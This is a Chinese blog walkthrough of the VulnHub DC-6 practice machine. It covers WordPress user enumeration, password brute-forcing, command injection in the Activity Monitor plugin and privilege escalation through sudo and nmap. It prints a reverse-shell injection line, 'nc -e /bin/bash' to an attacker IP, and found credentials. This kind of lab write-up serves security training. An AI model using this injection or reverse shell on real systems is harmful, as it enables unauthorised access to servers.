vulnhub - DC 6

最新推荐文章于 2024-01-23 20:46:44 发布
最新推荐文章于 2024-01-23 20:46:44 发布
阅读量98 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46164380/article/details/104907158
版权

扫描开启的服务:开启了22、80端口

目录遍历

查看80端口,发现是一个WordPress客框架

使用wpscan进行用户枚举

wpscan --url http://wordy --enumerate u 发现有五个用户

没有思路,在dc-6下载的官网有提示

根据提示生成密码字典

把五个用户写在一个文本,使用密码字典依次爆破

有一个mark用户 helpdesk01


在后台进行登录

这里有一个插件activity monitor;他有一个远程命令执行漏洞

Tools 这里有一个提交Lookup

抓包验证

命令输入执行nc监听

127.0.0.9 | nc -e /bin/bash 192.168.56.133 4444

查看home目录

Mark/stuff目录下面有一个文件

Graham是前面爆出来的用户;

22端口是开启的,可以尝试ssh连接

进行尝试提权

sudo -l 查看当前用户的执行权限

jens/下面的backups.sh是一个可执行shell文件

在里面写上一个/bin/bash并执行,实行水平越权;可以拿到一个shell

Sudo -u jens ./backups.sh

sudo -l 查看当前用户的执行权限

有一个nmap执行文件,是以root权限执行的

写一个nmap脚本,在执行脚本文件的时候,实现水平越权

成功

weixin_46164380
关注
专栏目录
小白的靶机VulnHub-Raven
wo41ge的博客
01-05 409
靶机地址:https://www.vulnhub.com/entry/raven-1,256/ 目标:找到四个flag.txt信息 开机界面就是个这 确定本次靶机地址:192.168.125.128 发现了22、80、111和36898端口是开放的 直接访问 康康呗 拿到flag1 flag1{b9bbcb33e11b80be759c4e844862482d} 继续 回去康康 发现他是wordpress 这个 我懂 直接上wpscan 扫它呗 命令:wpscan --url http://192
VulnHubDC-8
weixin_39219503的博客
02-02 422
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-8,367/ 题目信息如下 DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challeng...
Vulnhub】搭建Vulnhub靶机
最新发布
qq_53058639的博客
01-23 3343
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2290
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
VulnHubDC-6
weixin_39219503的博客
02-01 327
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-6,315/ 题目信息如下 Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. T...
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1684
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 187
今天继续趁着回家来用DC练练手。照旧先是扫一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,扫描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMS是Joomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再扫扫后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
VulnHub DC-1
weixin_45682839的博客
04-13 369
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 701
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1429
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub Node:1 详解
StriveBen的博客
09-03 1337
文章首发:https://xz.aliyun.com/t/2695 欢迎进群交流技术: 363034250 信息收集 arp-scan 用来发现系统和指纹识别的命令行工具。 从结果中可以看到node的ip是”192.168.92.129” 使用nmap对端口进行探测,如下图所示: 可知开放的端口有2个,分别是:22和3000,其中3000是个web服务; 详细banner信息...
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2432
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
Vulnhub-DC-8
KAKA的博客
07-04 361
首先用 namp 扫描,获取目标 IP 地址:nmap -sn 192.168.67.0/24 其次再用 nmap 扫描下目标端口:nmap -A -p- 192.168.67.52/24 看来开放了 80 和 22 端口,上去网页浏览下: 点开各个页面看看,可以发现有些 URL 地址栏会变,在这里补充个知识 Drupal 的 id 名称为 node id 简称 nid,这里因为显示 2 3 node 所以想着会不会有 SQL 注入: 尝试加个单引号,就会产生报错信息,这在 Sqlilabs 上面训
VulnHubDC-1
qq_45434762的博客
03-21 872
先进行一个粗糙的端口扫描首先我们对靶机所开放的端口进行扫描,发现有22,80,111端口开放Flag1既然开放了80端口,进去看看发现是Dupal CMS没有什么想法,现在MSF中搜一...
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3654
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
VulnHubDC-2
qq_45434762的博客
03-22 400
一个粗糙的端口扫描通过对目标主机进行端口探测,发现只开放了80端口,那就先访问一下看当我们通过IP访问的时候,会自动跳转成 http://dc-2我们需要在/etc/hosts 文件中...
bottleneck靶机_vulnhub之bottleneck的实践
weixin_28929351的博客
01-04 502
本周实践的是vulnhub的bottleneck镜像,下载地址,https://download.vulnhub.com/bottleneck/Bottleneck.ova,这个靶机的实验还是很有技术含量的,没点儿能力抄都抄不明白,首先用workstation导入ova镜像,发现获取不到ip地址,于是又换成virtualbox导入ova镜像,这回能获取到ip地址了,省的做地址扫描了,直接...
记一次vulnhub|渗透测试 DC-3
crispr的博客
01-17 1639
vulnhub DC-3 0X01 Main Point 1.searchsploit的使用 2.网站指纹识别(Wappalyzer插件) 3.Netcat(反弹shell)初步和下载脚本提权 4.探测Linux内核版本进行攻击得到root权限 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP,使用nmap探测端口开放,只有80端口开放。 先从网站入手看看有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值